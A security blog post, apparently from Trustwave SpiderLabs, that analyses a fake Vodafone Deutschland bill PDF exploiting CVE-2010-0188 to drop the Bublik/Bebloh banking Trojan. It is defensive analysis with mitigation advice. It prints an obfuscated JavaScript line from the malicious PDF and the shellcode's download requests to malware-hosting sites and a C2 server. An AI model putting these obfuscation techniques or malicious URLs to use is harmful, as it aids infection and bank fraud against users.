Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

An Analysis of a Fake Vodafone Bill PDF File

We haven't come across many malicious PDF files recently in our spam traps, so when we found this message, ostensibly from Vodafone Deutschland, we naturally took a closer look.

In this example, the cyber crooks are targeting Vodafone Deutschland customers by spamming a fake billing statement. The message claims to be from Vodafone-OnlineRechnung@vodafone.com.The spam may look harmless at first, especially given the links in the message point to the real Vodafone.de website. But the attached PDF file is indeed dangerous.

10085_7a58b4bf-5432-450b-9d2f-3d6300f8def5

I tested the attached PDF file against PDF Score (a tool developed by our colleague Rodrigo Montoro a.k.a Sp0oKeR) and it showed a number of suspect elements inside the file. You may check out Rodrigo's presentation about "Scoring PDF Structure To Detect Malicious Files" at SOURCE 2012 in Seattle: http://www.youtube.com/watch?v=qNlZiB2wnEM

10074_7a054f7e-e905-401f-9f96-d6339be65603
Detected as malicious by PDFScore.

 

The malicious PDF file was crafted to exploit the Libtiff vulnerability (CVE-2010-0188) in Adobe Reader 9.3 and earlier. The exploit crashes Adobe Reader and executes the attacker's malicious code.

The PDF uses two layers of JavaScript obfuscation before triggering the exploit and executing its payload. The first JavaScript was embedded inside this compressed XFA (XML Forms Architecture) form.

9212_4ea0eac4-c0af-4f8d-b9ed-14f146994057

The embedded data uses ZLIB compression, so decompressing was fairly easy. After scraping the compressed data out of the PDF file and some quick Python scripting, the malicious JavaScript lurking in the PDF file is revealed.

8698_35b2aae6-589e-41dc-a0a2-f57df1e8c205

Here's the code which is easier on the eyes:

12135_db3c9471-62b0-45da-9488-dae86d1f023d

In the JavaScript code, the variable "a" references to the tag "/Keywords"

a=/*ebwfweng`*/t["ke"+"ywo"+"rds"].split('|')[0]["substr"](13);

The string inside "/Keyword" will be de obfuscated inside a FOR loop and afterwards will be executed using JavaScript's eval() function. The image below shows the "/Keywords" tag containing a string of obfuscated JavaScript code. The code's job is to heap spray the shellcode to Adobe Reader's heap.

9692_672c249a-de43-422c-a523-bcdfd8099e8c

And here's the full HEX decoded shellcode, notice a couple of URLs below:

9816_6d8ed843-9219-4fdf-a6fa-90f5d1e87afb

The shellcode's ultimate intention is to download a couple of malicious file from the internet.

GET /stuff/corduroyshop/corduroyshop.exe Host:rocketmou.se (173.236.241.197:80)GET /mapa/images/mapa.exeHost: coachplay.co.il (173.236.217.119:80)

Both files are exactly the same executable from different URLs, perhaps for redundancy reasons. The malware is known as Bublik or Bebloh – a banking Trojan. https://www.virustotal.com/file/ffee98ae73c293f9fc4b2ab6076c64ad84256546cc97cb8eb572201d4a27c0d6/analysis/

The Bublik/Bebloh Trojan's payload connected to a command and control server and gathered email addresses in the infected machine by querying the WAB (Windows Address Book) registry. It disabled the Windows LUA(Least Privileged User Account) to run all applications (including the malware itself) as Administrator. It also changed the default browser to Internet Explorer in order to monitor the user's internet browsing habits and online banking.

Here's a TCP stream capture of the Trojan communicating to its command & control server at Trisi[.]net (94.249.209.21)

9552_5f91e494-dee5-4ea8-9096-d26ab8ff6186
The malware's command and control communication

 

The WHOIS info of the Trojan's command & control server domain name shows that it was just created recently last 15th of November, hmmm interesting!

12774_f878ecab-be7d-49d0-891f-8a272dcab3a7

Inconclusion, sometimes it's quite hard to distinguish legitimate and malicious email and this spam campaign is an example. But if you're a Vodafone customer in Germany who regularly receives monthly bill statement through email, there is a high chance of being sucked in and opening the attached PDF file.

Because this malicious PDF file makes use of JavaScript to execute the exploit, the best thing to be protected is to disable JavaScript in your PDF reader and use the latest version. In Adobe Reader, you can disable JavaScript through Edit->Preference then uncheck Enable Acrobat JavaScript.

9405_586e6172-9500-4cdf-a351-3870d3f9184a

Fortunately, if you have the latest Adobe Reader XI installed in your computer, the exploit inside the malicious PDF file will be rendered useless. Better yet, use an alternative PDF reader.

Customers of Trustwave MailMarshal Secure Email Gateway are protected against this threat.

Latest SpiderLabs Blogs

Hunting For Integer Overflows In Web Servers

Allow me to set the scene and start proceedings off with a definition of an integer overflow, according to Wikipedia:

Read More

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More